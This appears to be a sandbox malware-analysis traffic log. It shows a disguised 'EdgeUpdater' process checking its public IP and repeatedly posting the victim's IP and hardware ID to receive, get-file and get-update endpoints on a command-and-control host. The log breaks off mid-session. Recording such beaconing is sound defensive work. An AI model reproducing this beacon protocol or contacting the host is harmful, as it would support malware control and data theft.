Oct 3, 2024 03:30:21.199723005 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:21 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a9a2ea20f80-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:30:53.153734922 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:30:53.273907900 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:53 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92b6299940f80-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49716	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:14 UTC	167	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue Connection: Keep-Alive
2024-10-03 01:26:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:14 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:26:14 UTC	619	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BX3%2BFkBwC%2Fj50OrOK17NOf7AFcBGABAb%2BvnwVu7p%2Bs%2B04B%2BuzJ3sZApOfOqjuUVGfsRpbiOvlqhi0EP1AgQIZaa5tPlLicejtZCiax%2Bq6NYORw%2FjM9nX%2F45UEdselEU6RA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc924944a434299-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:15 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:26:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:15 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:26:16 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=olIPn4nJJTyrmsepFhbuyBS5d2GSWrp2xGfDHK%2FzTX63WAmjW2n520rHeRwz44kONhjCC%2FGT0H1%2BJEqlonhPa9NoM6acr5yNB15N3rU5EHZ%2FiZ4kPu6cVSPfdjkEoGyzrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9249bfd1c8ca7-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49718	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:16 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:26:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:16 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:26:16 UTC	609	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2OJdXRcxdtRs4L4TyQFT7g0NbRvPWpKfX4WQFpTubSPvIK2Qsi5OfNjU2V8ap4Qv6GcomcG1BX8YFweSfUriMPFCe2dKQc1%2Fbr25dxS6QGsByvPND%2By4XZ%2BIpu%2BJrPLZA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc924a1788a1801-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49729	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:47 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:26:47 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:47 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:26:48 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toEjJ08xYBu0KSdBp7gCYep1n4toTy3%2Bz7XS%2F1d%2FGS%2FKzL9Wbt0aOrzZErEOuk4HmJsLs2M03DYyt718P5PyvcC%2FUasZn4tFUAoojabhTzI8L6z5dxJhVPVoN5phg4RBsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9256418cd8c57-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49730	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:48 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:26:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:48 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:26:49 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gE6jVjnevpB%2BWAjHaQ37ikIsPi7wwFy8lDZN1AmAqgsAP0w5vyTJbxIQpKgRyqg6k%2FgPt91aOFeGv10x98PekVsvewXndYRbTBZe7KxLzEV8YoDsduizYXsKzQlxSI9AhQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9256adad3c443-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49731	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:26:49 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:26:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:26:49 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:26:50 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w2WMGWyP2cS%2BJF9%2BW988celZmnbCOKTLsS1xrHCD%2FV4czdxW4RWAp5uMmJdaI%2FQToPJJc%2BE2Vv8vcrIemiFoqZkrauwsbQtan5JsXFQQbWC%2BuLKGW7uoqEAOiFLR0aaMPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92570fa5f7ca0-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	52919	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:27:21 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:27:21 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:27:21 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:27:21 UTC	613	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9mCZsospj8nqUEQDpNhhro0r9G13kzxUAgHN0XwC8kB3tP70Mu6RQmA4M3%2BWf9c%2FWaJdebiV1cgS4bOJztYFnNoDfpag%2FXHdcnB4XR2%2BAn8mWnZGRm%2FFm7VIT2hY7%2B10jA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc926360df9c335-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	52920	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:27:22 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:27:22 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:27:22 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:27:23 UTC	637	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xkm1sIa%2BEVfABN8FYzM4vy04%2FGfnyZ6uJGBqjteyYV8ybQSgGNV7xYrzoT0DT8pqBZ5xkfJoPiz7bbADIZGFX0BdI4QcKnl%2BWT1C4TSzWeohF9ySvyTHRdIZXtb6cD4B3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9263ece8c0f3f-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	52921	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:27:23 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:27:23 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:27:23 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:27:24 UTC	607	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XwC97xdakPc4IiIpC7n8%2BNdwHIS1XGPJgdIdW0oRsuAqynF5ooGSVzWvErK%2FpFbS7C1dl%2FwrVIo5VZzyWfjxm8hReN2IlK3v807bcCLFp7qLLXCvGkphu2WtW6Q90I8PqA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc926464cad5e7d-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	52924	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:27:55 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:27:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:27:55 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:27:55 UTC	605	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qMRzAeRwPOz8yH08PLIzq0V42x94KOWCGCLd%2F7jde1nm4JC%2FT59kRveHlwCr2ruE88lzuQYJ5q8Mc2Fr5AwMy0U3e13b8WmardUmylg9Ng2diuFz2tvwPlvnPqM3CssHnA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc9270a58da32d9-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	52927	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:02 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:02 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:02 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wVmBeXTf56APsVg5THpBKsPrru9IEMZGJt3NGVfNaJBBAES8M2zM3%2FKCXqchFqbQD3nbLQyi19hrDQ%2Ba8daVqb4Ajnj1T%2B%2FbM4D3cnXIuXqXkyqu88OzV3OTnSt%2FJy0wrA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc92737ab0a8c77-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	52929	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:03 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:03 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:04 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiBdeT2v6PnUWeU233v4RhBYvebMFnIXonc3k80gNy%2FDgS0EuWNpvRg6QI%2FyMLCyyTj0p%2Br4NjYg1PrMOfC9DQ50GzbWnS%2BV7P0vOyupjyG2vvLiIxMFj%2F6YK2qMm0dNCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927408f650c7a-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	52930	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:04 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:04 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:04 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	52933	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:25 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:25 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:25 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:25 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=quoPapH3J6HNh0mqWtFgOcevIv4m6AGVXa2ShPRyZE1tyVpdO3cBqJj4KFwvNFDUpkuHLKdHjJ%2Fz09qstMfsoJiCuC7iSMOV%2BEIPb%2BOsH4Z%2Fa%2BScb666zIlG5NAnNMLtmQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927c76c184261-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	52935	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:26 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:27 UTC	84	OUT	Data Raw: 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390&ip=8.46.123.33
2024-10-03 01:28:27 UTC	600	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B2YemYAMAFrzllAKEHMkB5PnYQXnobvn2WSsZsORRiAVwY8ivGPZcRtHAw4zQaHB8CDoXQL1PO30kDpVNNFrLTEJ%2F%2BPZS7YVDUY5WH0O1I4vJicuxE2n6sAia4AOYDWpbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927d0b9bc430e-EWR
2024-10-03 01:28:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	52936	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:27 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-03 01:28:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:27 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-03 01:28:28 UTC	611	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XdXxtzCFQRsY7fiN3ZgcOJM9%2BePaVFxKyFS53fZdyoZOnfxppVCnwblygLuW2516XUeRoweBFxBjjr28QXm5CwcKr3Ul%2BB%2BQw5Vv9BQS1wwdBi9s%2Fcv9IgsMpxFKCbi%2Ftw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927d6788d0c74-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	52938	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 01:28:29 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-03 01:28:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 01:28:29 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 38 35 63 63 35 37 31 39 37 35 39 34 32 38 32 39 33 66 35 32 61 33 36 65 66 63 31 33 32 32 30 39 63 36 66 62 39 64 36 63 37 31 37 33 30 34 63 63 61 64 66 63 39 32 65 30 33 31 36 64 30 33 39 30 Data Ascii: ip=8.46.123.33&hwid=85cc5719759428293f52a36efc132209c6fb9d6c717304ccadfc92e0316d0390
2024-10-03 01:28:29 UTC	607	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTSTq0vezi1rFrrUt03CVNPCuKy0ZoQmvEhXCzo%2FRCqIBWXGgUrB1W%2BNGRrM8CVtxtpLMWMgJc5ke1C9tyXlEAoTQ3JYanFGzhO8Ve%2FCgaHyJkd4OKAuQAstUHiSDXneug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc927e0baee5e6b-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	52940	104.21.54.163	443	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
